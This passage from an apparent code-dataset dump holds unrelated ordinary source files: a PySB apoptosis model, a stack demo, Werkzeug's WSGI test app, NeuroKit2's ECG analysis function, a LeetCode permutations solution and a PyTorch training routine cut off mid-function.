SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None), pore_formation_2_BaxA_pore_2kf, 
pore_formation_2_BaxA_pore_1kr)\nRule('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + SmacM(BaxA=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=5, CytoCM=None) % SmacM(BaxA=5), transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_2kf, transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kr)\nRule('transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=5, CytoCM=None) % SmacM(BaxA=5) >> BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + SmacC(Xiap=None), transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kc)\nRule('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + CytoCM(BaxA=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=5) % CytoCM(BaxA=5), transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_2kf, transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kr)\nRule('transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=5) % CytoCM(BaxA=5) >> BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, SmacM=None, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, SmacM=None, CytoCM=None) + CytoCC(), transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kc)\nRule('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product', C8A(BidU=None, C3pro=None) + C3pro(Apop=None, C8A=None) | C8A(BidU=None, C3pro=1) % C3pro(Apop=None, C8A=1), catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_2kf, catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_1kr)\nRule('catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product', C8A(BidU=None, C3pro=1) % C3pro(Apop=None, C8A=1) >> C8A(BidU=None, C3pro=None) + C3A(Xiap=None, ParpU=None, C6pro=None), catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product_1kc)\nRule('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product', C3A(Xiap=None, ParpU=None, C6pro=None) + C6pro(C3A=None) | C3A(Xiap=None, ParpU=None, C6pro=1) % C6pro(C3A=1), catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_2kf, 
catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_1kr)\nRule('catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product', C3A(Xiap=None, ParpU=None, C6pro=1) % C6pro(C3A=1) >> C3A(Xiap=None, ParpU=None, C6pro=None) + C6A(C8pro=None), catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product_1kc)\nRule('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product', C6A(C8pro=None) + C8pro(Fadd=None, C6A=None) | C6A(C8pro=1) % C8pro(Fadd=None, C6A=1), catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_2kf, catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_1kr)\nRule('catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product', C6A(C8pro=1) % C8pro(Fadd=None, C6A=1) >> C6A(C8pro=None) + C8A(BidU=None, C3pro=None), catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product_1kc)\n\nInitial(Ligand(Receptor=None), Ligand_0)\nInitial(ParpU(C3A=None), ParpU_0)\nInitial(C8A(BidU=None, C3pro=None), C8A_0)\nInitial(SmacM(BaxA=None), SmacM_0)\nInitial(BaxM(BidM=None, BaxA=None), BaxM_0)\nInitial(Apop(C3pro=None, Xiap=None), Apop_0)\nInitial(Fadd(Receptor=None, C8pro=None), Fadd_0)\nInitial(SmacC(Xiap=None), SmacC_0)\nInitial(ParpC(), ParpC_0)\nInitial(Xiap(SmacC=None, Apop=None, C3A=None), Xiap_0)\nInitial(C9(), C9_0)\nInitial(C3ub(), C3ub_0)\nInitial(C8pro(Fadd=None, C6A=None), C8pro_0)\nInitial(C6A(C8pro=None), C6A_0)\nInitial(C3pro(Apop=None, C8A=None), C3pro_0)\nInitial(CytoCM(BaxA=None), CytoCM_0)\nInitial(CytoCC(), CytoCC_0)\nInitial(BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, SmacM=None, CytoCM=None), BaxA_0)\nInitial(ApafI(), ApafI_0)\nInitial(BidU(C8A=None), BidU_0)\nInitial(BidT(), BidT_0)\nInitial(C3A(Xiap=None, ParpU=None, C6pro=None), C3A_0)\nInitial(ApafA(), ApafA_0)\nInitial(BidM(BaxM=None), BidM_0)\nInitial(Receptor(Ligand=None, Fadd=None), Receptor_0)\nInitial(C6pro(C3A=None), C6pro_0)\n\n"} {"ext": "py", "sha": "1a2ebb1ee6774e2758c167ef110d7e7763063c69", "content": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\ndef main():\n \"\"\"Lists as piles\n \"\"\"\n\n # Create a stack\n my_stack = [1, 2, 3, 4]\n print(\"my_stack\", my_stack)\n\n # Push values on the stack\n my_stack.append(5)\n my_stack.append(6)\n my_stack.append(7)\n print(\"my_stack\", my_stack)\n\n # Pop values from the stack\n print(\"Poped value\", my_stack.pop())\n print(\"my_stack\", my_stack)\n print(\"Poped value\", my_stack.pop())\n print(\"my_stack\", my_stack)\n print(\"Poped value\", my_stack.pop())\n print(\"my_stack\", my_stack)\n print(\"Poped value\", my_stack.pop())\n print(\"my_stack\", my_stack)\n\n\nif __name__ == '__main__':\n main()\n"} {"ext": "py", "sha": "1a2ebbf26fdd2ee9721467b2ee844ef820c2732a", "content": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\n werkzeug.testapp\r\n ~~~~~~~~~~~~~~~~\r\n\r\n Provide a small test application that can be used to test a WSGI server\r\n and check it for WSGI compliance.\r\n\r\n :copyright: (c) 2013 by the Werkzeug Team, see AUTHORS for more details.\r\n :license: BSD, see LICENSE for more details.\r\n\"\"\"\r\nimport os\r\nimport sys\r\nimport werkzeug\r\nfrom textwrap import wrap\r\nfrom werkzeug.wrappers import BaseRequest as Request, BaseResponse as Response\r\nfrom werkzeug.utils import escape\r\nimport base64\r\n\r\nlogo = 
Response(base64.b64decode(\r\n'''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\r\n='''), mimetype='image/png')\r\n\r\n\r\nTEMPLATE = u'''\\\r\n\r\nWSGI Information\r\n\r\n
\r\n \"[The\r\n

WSGI Information

\r\n

\r\n This page displays all available information about the WSGI server and\r\n the underlying Python interpreter.\r\n

Python Interpreter

\r\n \r\n \r\n \r\n \r\n \r\n \r\n
Python Version\r\n %(python_version)s\r\n
Platform\r\n %(platform)s [%(os)s]\r\n
API Version\r\n %(api_version)s\r\n
Byteorder\r\n %(byteorder)s\r\n
Werkzeug Version\r\n %(werkzeug_version)s\r\n
\r\n

WSGI Environment

\r\n %(wsgi_env)s
\r\n

Installed Eggs

\r\n

\r\n The following python packages were installed on the system as\r\n Python eggs:\r\n

    %(python_eggs)s
\r\n

System Path

\r\n

\r\n The following paths are the current contents of the load path. The\r\n following entries are looked up for Python packages. Note that not\r\n all items in this path are folders. Gray and underlined items are\r\n entries pointing to invalid resources or used by custom import hooks\r\n such as the zip importer.\r\n

\r\n Items with a bright background were expanded for display from a relative\r\n path. If you encounter such paths in the output you might want to check\r\n your setup as relative paths are usually problematic in multithreaded\r\n environments.\r\n

    %(sys_path)s
\r\n
\r\n'''\r\n\r\n\r\ndef iter_sys_path():\r\n if os.name == 'posix':\r\n def strip(x):\r\n prefix = os.path.expanduser('~')\r\n if x.startswith(prefix):\r\n x = '~' + x[len(prefix):]\r\n return x\r\n else:\r\n strip = lambda x: x\r\n\r\n cwd = os.path.abspath(os.getcwd())\r\n for item in sys.path:\r\n path = os.path.join(cwd, item or os.path.curdir)\r\n yield strip(os.path.normpath(path)), \\\r\n not os.path.isdir(path), path != item\r\n\r\n\r\ndef render_testapp(req):\r\n try:\r\n import pkg_resources\r\n except ImportError:\r\n eggs = ()\r\n else:\r\n eggs = sorted(pkg_resources.working_set,\r\n key=lambda x: x.project_name.lower())\r\n python_eggs = []\r\n for egg in eggs:\r\n try:\r\n version = egg.version\r\n except (ValueError, AttributeError):\r\n version = 'unknown'\r\n python_eggs.append('
  • %s [%s]' % (\r\n escape(egg.project_name),\r\n escape(version)\r\n ))\r\n\r\n wsgi_env = []\r\n sorted_environ = sorted(req.environ.items(),\r\n key=lambda x: repr(x[0]).lower())\r\n for key, value in sorted_environ:\r\n wsgi_env.append('%s%s' % (\r\n escape(str(key)),\r\n ' '.join(wrap(escape(repr(value))))\r\n ))\r\n\r\n sys_path = []\r\n for item, virtual, expanded in iter_sys_path():\r\n class_ = []\r\n if virtual:\r\n class_.append('virtual')\r\n if expanded:\r\n class_.append('exp')\r\n sys_path.append('%s' % (\r\n class_ and ' class=\"%s\"' % ' '.join(class_) or '',\r\n escape(item)\r\n ))\r\n\r\n return (TEMPLATE % {\r\n 'python_version': '
    '.join(escape(sys.version).splitlines()),\r\n 'platform': escape(sys.platform),\r\n 'os': escape(os.name),\r\n 'api_version': sys.api_version,\r\n 'byteorder': sys.byteorder,\r\n 'werkzeug_version': werkzeug.__version__,\r\n 'python_eggs': '\\n'.join(python_eggs),\r\n 'wsgi_env': '\\n'.join(wsgi_env),\r\n 'sys_path': '\\n'.join(sys_path)\r\n }).encode('utf-8')\r\n\r\n\r\ndef test_app(environ, start_response):\r\n \"\"\"Simple test application that dumps the environment. You can use\r\n it to check if Werkzeug is working properly:\r\n\r\n .. sourcecode:: pycon\r\n\r\n >>> from werkzeug.serving import run_simple\r\n >>> from werkzeug.testapp import test_app\r\n >>> run_simple('localhost', 3000, test_app)\r\n * Running on http://localhost:3000/\r\n\r\n The application displays important information from the WSGI environment,\r\n the Python interpreter and the installed libraries.\r\n \"\"\"\r\n req = Request(environ, populate_request=False)\r\n if req.args.get('resource') == 'logo':\r\n response = logo\r\n else:\r\n response = Response(render_testapp(req), mimetype='text/html')\r\n return response(environ, start_response)\r\n\r\n\r\nif __name__ == '__main__':\r\n from werkzeug.serving import run_simple\r\n run_simple('localhost', 5000, test_app, use_reloader=True)\r\n"} {"ext": "py", "sha": "1a2ebd20ec2a87b1412881182523065a77696950", "content": "# -*- coding: utf-8 -*-\nimport pandas as pd\n\nfrom .ecg_eventrelated import ecg_eventrelated\nfrom .ecg_intervalrelated import ecg_intervalrelated\n\n\ndef ecg_analyze(data, sampling_rate=1000, method=\"auto\"):\n \"\"\"Performs ECG analysis on either epochs (event-related\n analysis) or on longer periods of data such as resting-state data.\n\n Parameters\n ----------\n data : dict, DataFrame\n A dictionary of epochs, containing one DataFrame per epoch,\n usually obtained via `epochs_create()`, or a DataFrame\n containing all epochs, usually obtained via `epochs_to_df()`.\n Can also take a DataFrame of processed signals from\n a longer period of data, typically generated by `ecg_process()`\n or `bio_process()`. Can also take a dict containing sets of\n separate periods of data.\n sampling_rate : int\n The sampling frequency of the signal (in Hz, i.e., samples/second).\n Defaults to 1000Hz.\n method : str\n Can be one of 'event-related' for event-related analysis on epochs,\n or 'interval-related' for analysis on longer periods of data. Defaults\n to 'auto' where the right method will be chosen based on the\n mean duration of the data ('event-related' for duration under 10s).\n\n Returns\n -------\n DataFrame\n A dataframe containing the analyzed ECG features. If\n event-related analysis is conducted, each epoch is indicated\n by the `Label` column. 
See `ecg_eventrelated()` and\n `ecg_intervalrelated()` docstrings for details.\n\n See Also\n --------\n bio_process, ecg_process, epochs_create, ecg_eventrelated, ecg_intervalrelated\n\n Examples\n ----------\n >>> import neurokit2 as nk\n >>>\n >>> # Example 1: Download the data for event-related analysis\n >>> data = nk.data(\"bio_eventrelated_100hz\")\n >>>\n >>> # Process the data for event-related analysis\n >>> df, info = nk.bio_process(ecg=data[\"ECG\"], sampling_rate=100)\n >>> events = nk.events_find(data[\"Photosensor\"],\n threshold_keep='below',\n event_conditions=[\"Negative\",\n \"Neutral\",\n \"Neutral\",\n \"Negative\"])\n >>> epochs = nk.epochs_create(df, events,\n sampling_rate=100,\n epochs_start=-0.1, epochs_end=1.9)\n >>> nk.ecg_analyze(epochs, sampling_rate=100)\n >>>\n >>> # Example 2: Download the resting-state data\n >>> data = nk.data(\"bio_resting_5min_100hz\")\n >>>\n >>> # Process the data\n >>> df, info = nk.ecg_process(data[\"ECG\"], sampling_rate=100)\n >>>\n >>> # Analyze\n >>> nk.ecg_analyze(df, sampling_rate=100)\n \"\"\"\n method = method.lower()\n\n # Event-related analysis\n if method in [\"event-related\", \"event\", \"epoch\"]:\n # Sanity checks\n if isinstance(data, dict):\n for i in data:\n colnames = data[i].columns.values\n elif isinstance(data, pd.DataFrame):\n colnames = data.columns.values\n\n if len([i for i in colnames if \"Label\" in i]) == 0:\n raise ValueError(\"NeuroKit error: ecg_analyze(): Wrong input\"\n \"or method, we couldn't extract\"\n \"extract epochs features.\")\n else:\n features = ecg_eventrelated(data)\n\n # Interval-related analysis\n elif method in [\"interval-related\", \"interval\", \"resting-state\"]:\n features = ecg_intervalrelated(data)\n\n # Auto\n elif method in [\"auto\"]:\n\n if isinstance(data, dict):\n for i in data:\n duration = len(data[i]) / sampling_rate\n if duration >= 10:\n features = ecg_intervalrelated(data)\n else:\n features = ecg_eventrelated(data)\n\n if isinstance(data, pd.DataFrame):\n if 'Label' in data.columns:\n epoch_len = data['Label'].value_counts()[0]\n duration = epoch_len / sampling_rate\n else:\n duration = len(data) / sampling_rate\n if duration >= 10:\n features = ecg_intervalrelated(data)\n else:\n features = ecg_eventrelated(data)\n\n return features\n"} {"ext": "py", "sha": "1a2ebe466abdbcf87500cf2d6c85c05e718b5ac7", "content": "# Q6\nI = (dt_true['income'] < 0.5)\ndt_true.loc[I, ['consumption']] = 0.5\ndt_true['consumption'].mean()"} {"ext": "py", "sha": "1a2ebe723752bd9e0fe6cb791a4bad866178fe19", "content": "# 47. 
Permutations II\n\nclass Solution:\n def permuteUnique(self, nums: List[int]) -> List[List[int]]:\n \"\"\"\n Given a collection of numbers that might contain duplicates, return all possible unique permutations.\n \"\"\"\n permutations = set()\n self.helper(nums, [], permutations)\n return permutations\n \n def helper(self, array, currentPermutation, permutations):\n if not len(array) and len(currentPermutation):\n permutations.add(tuple(currentPermutation))\n else:\n for index in range(len(array)):\n newArray = array[: index] + array[index + 1:]\n newPermutation = currentPermutation + [array[index]]\n self.helper(newArray, newPermutation, permutations)\n"} {"ext": "py", "sha": "1a2ec0438436e70f3f58ef493bca2cccbd7f42d3", "content": "import torch\nimport numpy as np\n\n\ndef train_perm_orth(train_loader, model, optimizer, scheduler, criterion, regularizer=None, rho=1E-4, delta=0.5,\n nu=1E-2, eps=1E-3, tau=1E-2, lagrange_pen=1E-2, perm_flag=True, t_step=40):\n if perm_flag:\n tau_min = 1E-24\n tau_max = 1E-1\n c = None\n lam_lm = []\n for p in optimizer.param_groups[0]['params']:\n lam_lm.append(torch.zeros_like(p))\n\n k_iter = 0\n ts = torch.empty(len(train_loader), device=model.device).uniform_(0.0, 1.0)\n with torch.no_grad():\n for p in optimizer.param_groups[0]['params']:\n p.data = torch.rand_like(p.data)\n p.data, _, _ = torch.svd(p.data)\n input_cml = []\n target_cml = []\n t_cml = []\n inner_iter = 0\n loss = 0.0\n loss_obj = 0.0\n for iter, (input, target) in enumerate(train_loader):\n t = ts[iter]\n input = input.to(model.device, non_blocking=False)\n target = target.to(model.device, non_blocking=False)\n output = model(input, perm_train=True, t=t)\n input_all = input\n target_all = target\n\n new_loss = criterion(output, target_all)\n loss_obj += new_loss\n\n # This part is for the augmented Lagrangian method\n int_pen = integer_penalty(optimizer.param_groups[0]['params'], lam_lm, lagrange_pen)\n\n loss += new_loss + int_pen\n\n inner_iter += 1\n input_cml.append(input.clone())\n target_cml.append(target.clone())\n t_cml.append(t.clone())\n if inner_iter % t_step == 0:\n optimizer.zero_grad()\n loss.backward()\n grad_norm = 0.0\n violator = 0.0\n for p in optimizer.param_groups[0]['params']:\n param_norm = p.grad.data.norm(2)\n grad_norm += param_norm.item() ** 2\n violator += torch.sum((torch.matmul(p.data.t(), p.data) - torch.eye(p.data.shape[0],\n device=p.device)) ** 2)\n grad_norm = grad_norm ** (1. 
/ 2)\n\n if c is None:\n c = loss.clone().item()\n q_opt = 1\n loss_inner = loss.clone()\n print('Iteration: %03d, Loss %.2E, Objective %.2E, Negative Penalty: %.2E,'\n 'Grad Norm: %.2E, Ortho Violation: %.2E, tau: %.2E' %\n (k_iter, loss_inner.item(), loss_obj.item(), int_pen.item(), grad_norm, violator.item(), tau))\n # Compute F for defining Y function\n F_list = []\n with torch.no_grad():\n for p in optimizer.param_groups[0]['params']:\n f = torch.matmul(p.grad.data, p.t().data) - torch.matmul(p.data, p.grad.t().data)\n F_list.append(f)\n # Store old parameters\n params_old = [None] * len(optimizer.param_groups[0]['params'])\n for idx, param in enumerate(optimizer.param_groups[0]['params']):\n params_old[idx] = param.clone()\n grads_old = [p.grad.data.clone() for p in optimizer.param_groups[0]['params']]\n\n # Compute the values of Y(tau) and Y'(tau), store them into the model\n Y_t, Y_ft_prime = compute_ytau(tau, F_list, optimizer.param_groups[0]['params'])\n for p, y_t in zip(optimizer.param_groups[0]['params'], Y_t):\n p.data = y_t.clone()\n loss_inner = 0.0\n for t_2, input_2, target_2 in zip(t_cml, input_cml, target_cml):\n output = model(input_2, perm_train=True, t=t_2)\n\n loss_inner += criterion(output, target_2)\n int_pen = integer_penalty(optimizer.param_groups[0]['params'], lam_lm, lagrange_pen)\n loss_inner += int_pen\n\n optimizer.zero_grad()\n loss_inner.backward()\n grads_new = [p.grad.data.clone() for p in optimizer.param_groups[0]['params']]\n\n with torch.no_grad():\n dF_dt = 0.0\n for g_new, y_ft_p in zip(grads_new, Y_ft_prime):\n df = g_new * (y_ft_p / torch.norm(y_ft_p.data))\n df = torch.sum(df)\n dF_dt += df.item()\n\n threshold_flag = True\n k_inner = 0\n while threshold_flag:\n with torch.no_grad():\n threshold = c + rho * tau * dF_dt\n if loss_inner.item() >= threshold:\n # Compute Y for smaller value of tau\n with torch.no_grad():\n tau *= delta\n Y_t, Y_ft_prime = compute_ytau(tau, F_list, optimizer.param_groups[0]['params'])\n for p, y_t in zip(optimizer.param_groups[0]['params'], Y_t):\n p.data = y_t.clone()\n\n loss_old = loss_inner.clone()\n loss_inner = 0.0\n for t_2, input_2, target_2 in zip(t_cml, input_cml, target_cml):\n output = model(input_2, perm_train=True, t=t_2)\n loss_inner += criterion(output, target_2)\n int_pen = integer_penalty(optimizer.param_groups[0]['params'], lam_lm, lagrange_pen)\n loss_inner += int_pen\n\n optimizer.zero_grad()\n loss_inner.backward()\n grads_new = [p.grad.data.clone() for p in optimizer.param_groups[0]['params']]\n\n k_inner += 1\n if (loss_inner.item() - loss_old.item()) / (1 + loss_old.item()) < 1E-5:\n threshold_flag = False\n else:\n threshold_flag = False\n\n with torch.no_grad():\n c = (nu * q_opt * c + loss_inner.item())\n q_opt = nu * q_opt + 1\n c = c / q_opt\n\n bb_num = 0.0\n bb_denom = 0.0\n yy_sum = 0.0\n for p_old, g_old, p_new, g_new in zip(params_old, grads_old, optimizer.param_groups[0]['params'],\n grads_new):\n s_bb = p_new - p_old\n y_bb = g_new - g_old\n bb_num += torch.sum(s_bb ** 2)\n bb_denom += torch.sum(s_bb * y_bb)\n yy_sum += torch.sum(y_bb ** 2)\n tau_bb = bb_num / torch.abs(bb_denom)\n tau_bb = tau_bb.item()\n tau_bb2 = torch.abs(bb_denom) / yy_sum\n tau_bb2 = tau_bb2.item()\n tau_bb = np.minimum(tau_bb, tau_bb2)\n tau = np.minimum(tau_bb, tau_max)\n tau = np.maximum(tau, tau_min)\n lam_lm, lagrange_pen = integer_penalty_update(optimizer.param_groups[0]['params'], lam_lm,\n lagrange_pen)\n\n loss_inner = 0.0\n for t_2, input_2, target_2 in zip(t_cml, input_cml, target_cml):\n output = 
model(input_2, perm_train=True, t=t_2)\n loss_obj = criterion(output, target_2)\n int_pen = integer_penalty(optimizer.param_groups[0]['params'], lam_lm, lagrange_pen)\n loss_inner += loss_obj + int_pen\n\n optimizer.zero_grad()\n loss_inner.backward()\n grads_new = [p.grad.data.clone() for p in optimizer.param_groups[0]['params']]\n\n grad_norm = 0.0\n for g_new in grads_new:\n gn = g_new.norm(2)\n grad_norm += gn.item() ** 2\n grad_norm = grad_norm ** (1. / 2)\n\n k_iter += 1\n input_cml = []\n target_cml = []\n t_cml = []\n loss = 0.0\n loss_obj = 0.0\n\n model.train()\n loss_sum = 0.0\n correct = 0.0\n\n change_P = np.nan\n\n params_before = [None] * len(optimizer.param_groups[0]['params'])\n if nu is not None:\n for idx, param in enumerate(optimizer.param_groups[0]['params']):\n params_before[idx] = param.clone().detach()\n\n optimizer.step()\n\n lr = scheduler.get_lr()[0]\n with torch.no_grad():\n for param, param_o in zip(optimizer.param_groups[0]['params'], params_old):\n param.data = 1 / (1 + lr / nu) * (param + lr / nu * param_o)\n\n output = model(input_all, perm_train=True)\n loss = criterion(output, target_all)\n if regularizer is not None:\n loss += regularizer(model)\n loss_sum += loss.item() * input.size(0)\n\n pred = output.data.argmax(1, keepdim=True)\n correct += pred.eq(target_all.data.view_as(pred)).sum().item()\n\n return {\n 'loss': loss_sum / len(train_loader.dataset),\n 'accuracy': correct * 100.0 / len(train_loader.dataset),\n 'change_perm': change_P\n }\n\n\ndef hard_int_penalty(p_list, pen=1E1):\n pen_loss = 0.0\n for p in p_list:\n p_mask = p.data * (p.data <= 0)\n pen_loss += pen * torch.sum(p_mask ** 2)\n return pen_loss\n\n\ndef integer_penalty(p_list, lam_list, mu):\n 